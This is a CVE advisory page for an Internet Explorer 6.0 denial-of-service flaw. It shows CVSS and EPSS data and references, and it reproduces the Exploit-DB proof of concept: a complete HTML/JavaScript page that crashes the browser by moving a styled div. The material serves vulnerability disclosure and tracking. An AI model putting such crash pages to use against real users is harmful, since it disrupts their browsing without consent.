CVE-2003-1505 : Detail

CVE-2003-1505

24.18%V4
Network
2007-10-25
17h00 +00:00
2017-07-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (crash) by creating a web page or HTML e-mail with a textarea in a div element whose scrollbar-base-color is modified by a CSS style, which is then moved.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23273

Publication date : 2003-10-21 22h00 +00:00
Author : Andreas Boeckler
EDB Verified : Yes

source: https://www.securityfocus.com/bid/8874/info It has been reported that Microsoft Internet Explorer is prone to a vulnerability that may allow an attacker to cause a denial of service condition in the software. The problem occurs due to improper handling of scrollbar-base-color attribute of the div object. Successful exploitation of this issue may allow an attacker to create a webpage containing malicious script code that would cause a user's browser to crash upon visiting the site. Microsoft Internet Explorer 6.0 has been reported to be vulnerable to this issue, however other versions may be affected as well. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>CRASH-IE</title> <style type="text/css"> html, body { overflow-y: hidden; scrollbar-base-color: '#330066'; } .crash { position:absolute; left:200px; top:200px; width:200px; } </style> <script type="text/javascript"> function galgenfrist() { window.setTimeout('crashIE();',1000); } function crashIE() { var moveNode = document.getElementById("move"); if(moveNode) { moveNode.style.top = "100px"; moveNode.style.left = "200px"; } } </script> </head> <body onload="galgenfrist();"> <h1>CRASH-IE</h1> <div id="move" class="crash"> <table> <tbody> <tr> <td> <textarea>&lt;/textarea&gt; </td> </tr> </tbody> </table> </div> </body> </html>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 6

References

http://securityreason.com/securityalert/3295
Tags : third-party-advisory, x_refsource_SREASON
http://www.securityfocus.com/bid/8874
Tags : vdb-entry, x_refsource_BID
http://www.securityfocus.com/archive/1/342010
Tags : mailing-list, x_refsource_BUGTRAQ